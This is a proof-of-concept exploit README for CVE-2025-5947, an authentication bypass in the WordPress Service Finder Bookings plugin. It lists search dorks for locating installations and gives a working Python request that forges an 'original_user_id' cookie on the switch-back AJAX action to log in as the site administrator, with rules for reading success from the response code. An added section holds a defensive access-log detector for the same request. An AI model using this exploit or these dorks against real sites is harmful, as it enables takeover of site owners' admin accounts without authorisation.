
CVE-2025-5947 PoC — WordPress plugin Service Finder Bookings security vulnerability

Related vulnerability
Title: WordPress plugin Service Finder Bookings security vulnerability (CVE-2025-5947)
Description: WordPress and WordPress plugins are products of the WordPress Foundation. WordPress is a blogging platform developed in PHP; it lets users host a personal blog on a server running PHP and MySQL. A WordPress plugin is an application plugin. The WordPress plugin Service Finder Bookings in versions 6.0 and earlier has a security vulnerability caused by an authentication bypass, which may lead to privilege escalation.
Description
A mini exploit for the Service Finder Bookings WordPress plugin
Introduction
# 🔍 WordPress Plugin Exploit — Service Finder (sf-booking)

## Overview

The **Service Finder** plugin is a booking and service management system for WordPress.  
Because of its popularity and complexity, some versions have had security issues related to **unauthenticated AJAX endpoints** or improper access controls.

This README explains how researchers can safely fingerprint installations and follow ethical practices (dbr krk).

---

## Vulnerable WP dorks

`/wp-content/plugins/service-finder/`

`/wp-content/plugins/service-finder-bookings/`

`/wp-content/plugins/sf-booking/` 

---

## Exploit Workflow

> ⚠️ **Disclaimer:**  
> These searches are for **educational** and **research** use only. Do **not** attempt unauthorized access or exploitation.

```python
import requests

# Placeholder target URL; the AJAX action is the one affected by CVE-2025-5947.
url = "https://example.com/wp-admin/admin-ajax.php?action=service_finder_switch_back"
cookies = {
    'original_user_id': '1',
}

# Do not follow redirects: the status check below relies on seeing the raw 3xx
# response, and requests would otherwise follow it and report the final 200 instead.
r = requests.get(url, cookies=cookies, allow_redirects=False)
print(r.status_code)
print(r.text)
```

* `300-399`: ✅ vulnerable: the endpoint redirects into the admin panel as the admin user
* `400-499`: ⚠️ client error: the request was invalid or unauthorized; not vulnerable
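For the defending side, an added example that is not part of the original README: a small detector that flags requests to the `service_finder_switch_back` action in a web server access log, assuming the Apache/nginx combined log format. The sample log lines are constructed and use documentation addresses.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined access-log format: client ip, identity, user, [time], "request", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# The AJAX action used by the PoC above.
SUSPICIOUS_ACTION = "service_finder_switch_back"

# Constructed sample lines (RFC 5737 documentation addresses); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2025:12:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=service_finder_switch_back HTTP/1.1" 302 0 "-" "python-requests/2.32.0"
203.0.113.5 - - [10/Oct/2025:12:00:02 +0000] "GET /wp-admin/ HTTP/1.1" 200 5120 "-" "python-requests/2.32.0"
198.51.100.7 - - [10/Oct/2025:12:01:10 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 60 "-" "Mozilla/5.0"
192.0.2.44 - - [10/Oct/2025:12:03:30 +0000] "GET /wp-admin/admin-ajax.php?action=service_finder_switch_back HTTP/1.1" 403 0 "-" "curl/8.0"
"""

def parse_line(line):
    """Split one combined-format line into fields; None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    return {"ip": m.group("ip"), "time": m.group("time"), "path": parts.path,
            "query": parse_qs(parts.query), "status": int(m.group("status"))}

def detect_switch_back_abuse(log_text):
    """One alert per admin-ajax.php request carrying the switch-back action; a 3xx
    (what the PoC above reads as a successful switch) is 'likely_success', a refusal
    is still an 'attempt', since anonymous clients have no reason to call this action."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not rec["path"].endswith("/wp-admin/admin-ajax.php"):
            continue
        if SUSPICIOUS_ACTION not in rec["query"].get("action", []):
            continue
        verdict = "likely_success" if 300 <= rec["status"] < 400 else "attempt"
        alerts.append({"ip": rec["ip"], "time": rec["time"],
                       "status": rec["status"], "verdict": verdict})
    return alerts

if __name__ == "__main__":
    for alert in detect_switch_back_abuse(SAMPLE_LOG):
        print(alert)
```

Cookies are not in standard access logs, so the detector keys on the action parameter alone; correlate a `likely_success` hit with the same client's following `/wp-admin/` requests when triaging.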

---

## References

- WPScan Plugin Database — https://wpscan.com/plugins/  
- National Vulnerability Database (NVD) — https://nvd.nist.gov/  
- OWASP — Google Dorking / reconnaissance techniques  
- HackerOne Disclosure Guidelines — https://www.hackerone.com/disclosure-guidelines

---

## Author

**[Taha Mounir](https://github.com/M4rgs)**

---